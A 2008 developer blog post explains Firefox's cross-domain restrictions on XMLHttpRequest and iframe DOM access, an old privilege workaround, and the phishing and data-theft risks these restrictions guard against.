If you are a web developer you may have experienced that there are many situations that you need to access remote domains for data sources. For an example if you are building a weather mashup, you may like to connect to some weather forecasting services like http://www.weather.gov or http://weather.cnn.com/weather/forecast.jsp. Mostly these services are very simple, so you can build these services from Javascript itself. (FYI you can use the blog post, I wrote sometime back, Calling Simple Web Services From Javascript.) But browsers doesn’t make it this much straight forward.
For an example if you try running the following code, which basically do a simple AJAX call to an external domain,
// some external domainvar url = "http://test.dimuthu.org"; // doing the ajax callvar req = new XMLHttpRequest(); req.open("GET", url, true); req.onreadystatechange = function(e){if(req.readyState == 4){if(req.status == 200){alert(req.responseText); }}} req.send(null);
You will get a security exception from the Firefox (opera too gives a similar exception).
uncaught exception: Access to restricted URI denied (NS_ERROR_DOM_BAD_URI)
In order to avoid this, you have do some special work.
You need to add the following code before doing any AJAX request to external domains, This will give the script special privileges to access any domain through XMLHttpRequest object.
try{ netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead"); }catch(e){alert("Permission UniversalBrowserRead denied."); }
If your script always jump to the exception, you have to configure your browser to allow the above setting. You can do this by going to the “about:config” page in Firefox (Just type the “about:config” in the url field and hit Enter) where it shows a list of configurations, there you need to set “signed.applets.codebase_principal_support” field to “true”. By default this field is set to false in Firefox 3.0
After you completed above 2 steps, the page will show you an warning message saying that it is asking more privileges, in which the client have to click the “allow” button to continue.
This procedure is not much difficult to setup, but still it will be really painful for an average user, so it is better you avoid this as much as possible in your code.
The main reason this special setup is arranged in Firefox (and most of the other browsers) is attackers can run malicious scripts in some page which you trust, (for an example from one of your email message) and send your private data to some other domain that you don’t know and don’t trust.
Apart from XMLHttpRequest another famous way of accessing different domains from a web page is using framesets or iframes. using this technique, You can show an external web page inside yours as it is one part of that.
Before Firefox 3.0 and IE 7.0 you were able to change that external page (appearance or the content) according to your need when it is shown in a frame or iframe. This was possible to do by manipulating the DOM of that external page. But with Firefox 3.0 and IE 7.0 it is impossible. That is you still you can show an external page inside your web page, but you can’t change anything of it even it shows inside your page. Because it doesn’t allow you to access the DOM of that external page. See this issue is discussed in details at here,https://bugzilla.mozilla.org/show_bug.cgi?id=397828
With this improvement, you can’t call the window.document if the page of the window is from external domain.
The reason to this limitation is apparent, if you ever thought of modifying external pages and put it in your web page, you will be able feel many security holes in there. You can show some web based email login page in one of iframe, and fool some users. If that web based email application is not changed by the iframe container, it won’t be a problem, but how it is changed to submit your username, password to the parent site by updating the submit event (onclick attribute) of the DOM of that external page.
In fact Firefox and most of the browsers are trying to protect your from all these security attacks by restricting lot of functionalities of the browsers. They are doing what they can do it in the client side, but you don’t know what exactly happens in the server side since it is always a black box. The all the restriction mentioned above (i.e. accessing remote services, changing and showing an external web page) can be done in very simple PHP or .NET code in server side. So it is right that you should use the right tools, but more important thing is you are aware of these attacks and you selectively browse web while avoiding them。
http://www.dimuthu.org/blog/2008/12/22/security-considerations-in-firefox-when-accessing-different-domains/